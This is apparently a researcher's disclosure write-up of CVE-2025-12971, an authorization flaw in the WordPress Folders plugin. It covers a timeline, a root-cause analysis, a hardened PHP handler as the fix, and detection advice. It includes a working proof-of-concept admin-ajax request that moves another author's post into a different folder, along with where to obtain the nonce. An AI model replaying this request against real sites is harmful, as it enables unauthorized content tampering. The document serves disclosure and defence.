CVE-2025-12971 affects the WordPress plugin “Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager” (plugin slug: folders), which is widely deployed and reported at roughly 90,000+ active installations in the WordPress.org ecosystem (often referenced as “100k+” in rounded terms). The vulnerability is an incorrect authorization / object-level access control failure in AJAX handlers used to assign “folder” taxonomy terms to posts and pages. In effect, a low-privileged authenticated user can modify folder assignments on content they do not own by directly calling the AJAX endpoints with a victim post_id, bypassing the normal WordPress UI restrictions that would otherwise block edits to another author’s post.
| Field | Value |
|---|---|
| CVE | CVE-2025-12971 |
| Plugin Version | Folders <= 3.1.5 |
| Severity | High |
| All Time | 2 005 942 |
| Active installations | 100 000+ |
| Publicly Published | November 26, 2025 |
| Last Updated | November 26, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-12971 |
| Reference | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/folders/folders-315-incorrect-authorization-to-authenticated-contributor-folder-content-manipulation |
Timeline

| Date | Event |
|---|---|
| October 30, 2025 | Plugin testing and vulnerability detection in the Folders plugin have been completed |
| October 30, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 26, 2025 | Registered CVE-2025-12971 |
Discovery of the Vulnerability
The exposed behavior is driven by the plugin’s server-side logic applying a coarse capability check (e.g., “can edit posts/pages in general”) and a term-scoped nonce tied to a folder term, while failing to enforce a post-scoped authorization check for each target object. The NVD record describes this as a “misconfigured capability check” in the wcp_change_post_folder function, impacting versions up to and including 3.1.5, and enabling authenticated attackers with Contributor-level access and above to move arbitrary folder contents. In practical terms, this means the handler validates that the caller is a logged-in user with some editorial capability and that the nonce is valid for the destination folder, but does not validate that the caller is permitted to edit the specific post_id being modified—precisely the condition that produces an IDOR-style horizontal privilege escalation.
Understanding Missing Auth Attacks
In WordPress security, the difference between “permission to use a feature” and “permission to affect a specific object” is decisive. Folder assignment looks like “just organization,” but on production sites it is frequently part of editorial workflow, publishing rules, internal review queues, and content governance conventions; unauthorized changes can create operational confusion, hide content from expected views, and sabotage team processes without touching the post body itself. CVE-2025-12971 is a textbook case of CWE-863 (Incorrect Authorization), where a check exists but is not the correct check for the object being modified. The risk is amplified by the fact that attackers do not need to defeat authentication and do not need administrator access; they only need a role that can access the relevant editor screens and obtain a valid nonce for a folder term, then they can apply that folder term to a post they cannot otherwise edit.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-12971, an attacker authenticated with Contributor+ cookies sends the following request (PoC):

```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/wordpress/wp-admin/edit.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 91
Origin: http://127.0.0.1
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: Contributor+
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=wcp_change_post_folder&post_id=1433&folder_id=89&type=post&status=1&nonce=bd59d34e7f
```

The nonce value is taken from the folder data the plugin embeds in http://127.0.0.1/wordpress/wp-admin/edit.php (a JSON object of the form `{"folder_id":89, ..., "nonce":"bd59d34e7f"}`); it is scoped to the folder term, not to the post, so post_id can name a victim post the caller is not allowed to edit.
Operationally, this is best understood as workflow tampering and horizontal privilege escalation rather than a purely cosmetic change. An attacker with Contributor/Author-level access can reorganize other users’ content into arbitrary folders, undermining editorial organization, misrouting content pipelines, and creating confusion during content review or publication cycles. On sites where folder views drive internal dashboards, these changes can effectively “hide” or “misclassify” content without needing to modify titles, bodies, or statuses, which can delay detection and complicate incident response. The NVD entry scores the impact primarily on integrity (unauthorized modification of data) and explicitly states that affected versions enable authenticated attackers to move arbitrary folder contents. Even when the change is reversible, the security consequence is that content governance boundaries between authors are no longer enforced reliably at the application layer.
Recommendations for Improved Security
The core fix is to enforce object-level authorization for every post being modified, not merely a folder-term authorization or a coarse “edit posts” permission. Before calling wp_set_post_terms(...), the handler should validate that post_id is an integer, confirm the post exists, and then enforce current_user_can('edit_post', $post_id) (and/or current_user_can('edit_page', $post_id), depending on post type) for each target object, failing closed if the user lacks permission. This is the missing step that distinguishes “user can use folders” from “user can change folders on this post.” In parallel, keep the nonce check, but treat it as request integrity (CSRF protection) rather than authorization; the CVE is about incorrect authorization, so the capability check must be corrected, not merely supplemented. Finally, site owners should update beyond the affected range (NVD lists versions up to and including 3.1.5 as vulnerable), audit role assignments for unnecessary Contributor/Author accounts, and consider monitoring for suspicious bulk folder moves as an operational detection control.
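The following is an added illustration of that fix pattern, not the plugin's own code: a hardened AJAX handler for the wcp_change_post_folder action that keeps the nonce as CSRF protection and adds the post-scoped capability check. The nonce action string, the taxonomy name constant, the handler and hook names, and the audit action are assumptions for the example.

```php
<?php
// Added example (not the Folders plugin's code). Assumed names: the handler
// function, the folder taxonomy constant, the nonce action and the audit hook.
define( 'EXAMPLE_FOLDER_TAXONOMY', 'example_folder_taxonomy' ); // placeholder taxonomy name

add_action( 'wp_ajax_wcp_change_post_folder', 'example_change_post_folder' );

function example_change_post_folder() {
    // Coerce inputs to non-negative integers; anything else becomes 0 and fails below.
    $post_id   = isset( $_POST['post_id'] )   ? absint( $_POST['post_id'] )   : 0;
    $folder_id = isset( $_POST['folder_id'] ) ? absint( $_POST['folder_id'] ) : 0;
    $nonce     = isset( $_POST['nonce'] ) ? sanitize_text_field( wp_unslash( $_POST['nonce'] ) ) : '';

    // 1. Nonce check = request integrity (CSRF), NOT authorization. Action name assumed.
    if ( ! $post_id || ! $folder_id || ! wp_verify_nonce( $nonce, 'example_folder_' . $folder_id ) ) {
        wp_send_json_error( array( 'message' => 'Invalid request' ), 400 ); // wp_die()s
    }

    // 2. The target object must exist.
    $post = get_post( $post_id );
    if ( ! $post ) {
        wp_send_json_error( array( 'message' => 'Post not found' ), 404 );
    }

    // 3. Object-level authorization: may THIS user edit THIS post?
    //    'edit_post' is a meta capability; map_meta_cap() resolves it against the
    //    post's type and author, so a Contributor fails here for another author's post.
    //    A coarse current_user_can( 'edit_posts' ) is the CWE-863 mistake being fixed.
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 4. The destination folder term must exist in the folder taxonomy.
    $term = get_term( $folder_id, EXAMPLE_FOLDER_TAXONOMY );
    if ( ! $term || is_wp_error( $term ) ) {
        wp_send_json_error( array( 'message' => 'Folder not found' ), 404 );
    }

    // 5. Only now change the assignment (replace, not append, the folder term).
    $result = wp_set_post_terms( $post_id, array( (int) $term->term_id ), EXAMPLE_FOLDER_TAXONOMY, false );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }

    // 6. Emit an audit event so bulk folder moves can be logged and alerted on.
    do_action( 'example_folder_assignment_changed', get_current_user_id(), $post_id, (int) $term->term_id );
    wp_send_json_success( array( 'post_id' => $post_id, 'folder_id' => (int) $term->term_id ) );
}
```

Hooking the audit action into a logger and alerting when one user reassigns many posts they do not author in a short window gives the "bulk folder move" detection control mentioned above.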
By taking proactive measures to address Missing Auth vulnerabilities like CVE-2025-12971, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Dmitrii I.
